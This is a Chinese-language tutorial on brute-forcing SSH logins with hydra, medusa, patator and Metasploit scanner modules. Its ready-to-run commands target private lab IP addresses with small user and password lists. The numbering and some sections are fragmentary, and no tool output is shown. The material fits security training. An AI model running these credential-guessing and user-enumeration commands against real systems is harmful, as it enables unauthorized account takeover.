hydra(海德拉)
hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
-l #指定用户
-L #指定用户文件
-P #指定密码文件
-p #指定密码
-M #指定目标主机ip的文件
-t #指定线程数
先自己做一个用户文件和一个密码文件,当然实际生产中密码文件是不可能自己写的,需要找密码字典来破解密码
root@kali:~# cat userlist.txt
root
jack
tom
alice
admin
root@kali:~# cat passlist.txt
1
2
3
123
1234
12345
123456
23445
root@kali:~# hydra -l root -P passlist.txt 192.168.0.108 ssh
root@kali:~# hydra -L userlist.txt -P passlist.txt 192.168.0.104 ssh
medusa(美杜莎)
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行强力测 试。Medusa 和 hydra 一样,同样属于在线密码破解工具。不同的是,medusa 的稳定性相较于 hydra 要好很多,但 其支持模块要比 hydra 少一些
1、语法参数
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] 目标主机名称或者IP地址
-H [FILE] 包含目标主机名称或者IP地址文件
-u [TEXT] 测试的用户名
-U [FILE] 包含测试的用户名文件
-p [TEXT] 测试的密码
-P [FILE] 包含测试的密码文件
-C [FILE] 组合条目文件
-O [FILE] 日志信息文件
-e [n/s/ns] n代表空密码,s代表为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块
-d 显示所有的模块名称
-n [NUM] 使用非默认Tcp端口
-s 启用SSL
-r [NUM] 重试间隔时间,默认为3秒
-t [NUM] 设定线程数量
-T 同时测试的主机总数
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止破解
-F 在任何主机上找到第一个有效的用户名/密码后停止审计
-q 显示模块的使用信息
-v [NUM] 详细级别(0-6)
-w [NUM] 错误调试级别(0-10)
-V 显示版本
-Z [TEXT] 继续扫描上一次
/2、破解SSH密码
root@kali:~# medusa -M ssh -h 192.168.0.104 -u root -p 123
root@kali:~# medusa -M ssh -h 192.168.0.104 -u root -p 123456
root@kali:~# medusa -M ssh -h 192.168.0.104 -U userlist.txt -P passlist.txt
加上root一共三个用户全部破解成功
root@kali:~# cat hostlist.txt
192.168.0.104
192.168.0.108
root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt
root@kali:~# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt -O ssh.log
root@kali:~# cat ssh.log
patator
强大的命令行暴力破解器
1、可用模块
2、破解SSH密码
root@kali:~# patator ssh_login --help
Patator v0.6 (http://code.google.com/p/patator/)
Usage: ssh_login <module-options ...> [global-options ...]
Examples:
ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
root@kali:~# patator ssh_login host=192.168.0.104 user=root password=FILE0 0=passlist.txt
root@kali:~# patator ssh_login host=192.168.0.104 user=root password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed.'
root@kali:~# patator ssh_login host=192.168.0.104 user=FILE1 1=userlist.txt password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed.'
root@kali:~# patator ssh_login host=FILE2 2=hostlist.txt user=FILE1 1=userlist.txt password=FILE0 0=passlist.txt -x ignore:mesg='Authentication failed.'
MSF
Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试, Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语 言,汇编程序和Python编写的可选组件。
1
root@kali:~# msfconsole
msf > search ssh
2、用户枚举
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.0.108
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/userlist.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > run
SSH版本探测
msf auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.0.108
msf auxiliary(scanner/ssh/ssh_version) > run
4、SSH暴力破解
msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.108
msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/userlist.txt
msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passlist.txt
msf auxiliary(scanner/ssh/ssh_login) > run